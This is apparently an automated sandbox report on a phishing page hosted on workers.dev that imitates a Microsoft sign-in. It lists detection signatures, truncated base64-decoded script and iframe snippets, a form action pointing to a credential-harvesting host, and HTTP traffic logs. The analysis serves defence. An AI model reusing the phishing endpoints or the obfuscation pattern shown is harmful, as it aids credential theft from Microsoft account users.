Edit tour

Windows Analysis Report
https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP

Overview

General Information

Sample URL:https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
Analysis ID:1650392
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 1064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.5..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    0.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path appear to be random strings, which is a common tactic in phishing URLs to obscure the true nature of the site., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 0.6.pages.csv
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path structure appear random and do not convey any direct association with Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the URL does not support legitimacy., The URL contains no direct reference to Microsoft, which is suspicious. DOM: 0.5.pages.csv
      Source: Yara matchFile source: 0.5..script.csv, type: HTML
      Source: Yara matchFile source: 0.5.pages.csv, type: HTML
      Source: 0.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.... This script demonstrates high-risk behavior by using the `atob()` function to decode a base64-encoded string that contains an HTML snippet. The decoded HTML includes an `iframe` element that loads content from an external domain (`qsquarred.com`), which is a potential indicator of malicious activity such as phishing or drive-by downloads. The use of obfuscated code and the inclusion of an external iframe are strong indicators of suspicious and potentially harmful behavior, warranting a high-risk score.
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: Form action: https://qsquarred.com/common/login workers qsquarred
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: Number of links: 0
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: Base64 decoded: <!doctype html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="margin:0;padding:0"><iframe src="https://qsquarred.com/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczov...
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: <input type="password" .../> found
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No <meta name="author".. found
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 172.67.173.239:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.173.239:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.30.213:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.44.201.172:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 9MB later: 40MB
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.172
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
      Source: global trafficHTTP traffic detected: GET /?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9270269dc843c451&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9270269dc843c451/1743091753667/04912e90f56c6e1fcc6d0f75d35e8e0ec6fe019572ee4c4cb151a3402ea8ef5c/upl_LijoGNscKgt HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3FzcXVhcnJlZC5jb20vIiwiZG9tYWluIjoicXNxdWFycmVkLmNvbSIsImtleSI6IkZZa0o4RjRUVHJrVCIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDkxNzcyLCJleHAiOjE3NDMwOTE4OTJ9.LzstCOvhrXFSFTQ5K2KWyFNPTbA0byj9xF5xo8K4D6M HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /index.html//?uuq_tgnqcf=vtwg HTTP/1.1Host: qsquarred.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
